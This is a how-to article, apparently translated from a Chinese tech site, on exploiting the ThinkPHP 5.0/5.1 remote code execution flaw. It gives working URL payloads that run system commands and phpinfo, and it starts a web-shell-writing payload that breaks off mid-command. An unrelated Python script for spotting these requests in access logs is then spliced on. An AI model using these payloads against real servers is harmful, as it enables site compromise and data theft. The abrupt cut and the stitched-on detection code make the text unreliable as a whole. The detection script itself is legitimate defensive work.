How to implement ThinkPHP 5.0 remote code execution

2025-01-31 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article is about how ThinkPHP 5.0 remote code execution is achieved. The editor finds it very practical and shares it here so that readers can learn from it. Without further ado, let's take a look.

ThinkPHP is a popular open source PHP framework in China. Some versions may contain a remote code execution vulnerability: attackers can write PHP code to the cache file, resulting in remote code execution. Although exploiting this vulnerability has several prerequisites, the large number of domestic sites that use the ThinkPHP framework means it still has a certain scope of impact.

Affected versions include 5.0 and 5.1.

Download the ThinkPHP 5.0.22 source code, put it in the PHPStudy running directory and visit it.

1. Append the payload to the URL

Payload1: remote command execution with the system function

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

Payload2: the phpinfo function shows the phpinfo() information

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

2. Write a shell with the payload and connect with Kitchen Knife (China Chopper)

Payload1: writing the shell

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^
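
The payloads above all route the request to think\app/invokefunction, which makes them easy to spot in web server access logs. The following detection sketch is an added example, not code from the original article or from ThinkPHP: it normalises each request target (percent-encoding, log-escaped backslashes, repeated slashes) and reports which function and callable were requested. The combined log format, the sample log lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Route shared by the payloads on this page, as it looks after normalisation
ROUTE_RE = re.compile(r"think/app/invokefunction")
PARAM_RE = re.compile(r"[?&](function|vars\[0\])=([^&]*)")

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    r'192.0.2.5 - - [31/Jan/2025:10:00:00 +0000] "GET /index.php?s=index/index/hello&name=think HTTP/1.1" 200 512',
    r'192.0.2.10 - - [31/Jan/2025:10:00:01 +0000] "GET /index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 31',
    r'198.51.100.7 - - [31/Jan/2025:10:00:02 +0000] "GET /index.php?s=index%252Fthink%255Capp%252Finvokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1 HTTP/1.1" 200 90210',
    r'192.0.2.5 - - [31/Jan/2025:10:00:03 +0000] "GET /static/app.js HTTP/1.1" 200 2048',
]

def normalise(target):
    """Undo up to three layers of percent-encoding, lowercase, unify slashes."""
    for _ in range(3):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    # nginx logs a backslash as \x5C and Apache as \\; treat both as "/"
    target = target.lower().replace("\\x5c", "\\").replace("\\", "/")
    return re.sub(r"/+", "/", target)

def classify(target):
    """Return the requested function/callable if the target hits the route, else None."""
    norm = normalise(target)
    if not ROUTE_RE.search(norm):
        return None
    params = dict(PARAM_RE.findall(norm))
    return {"function": params.get("function", ""), "callable": params.get("vars[0]", "")}

def scan(lines):
    """Return (line number, client IP, function, callable) for each matching log line."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        finding = classify(m.group(1)) if m else None
        if finding:
            hits.append((lineno, line.split()[0], finding["function"], finding["callable"]))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("suspicious request: line %d from %s, function=%s, callable=%s" % hit)
```

A hit only shows that the request was made; the response status and size in the same log line, together with the installed framework version, indicate whether the application actually processed it.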
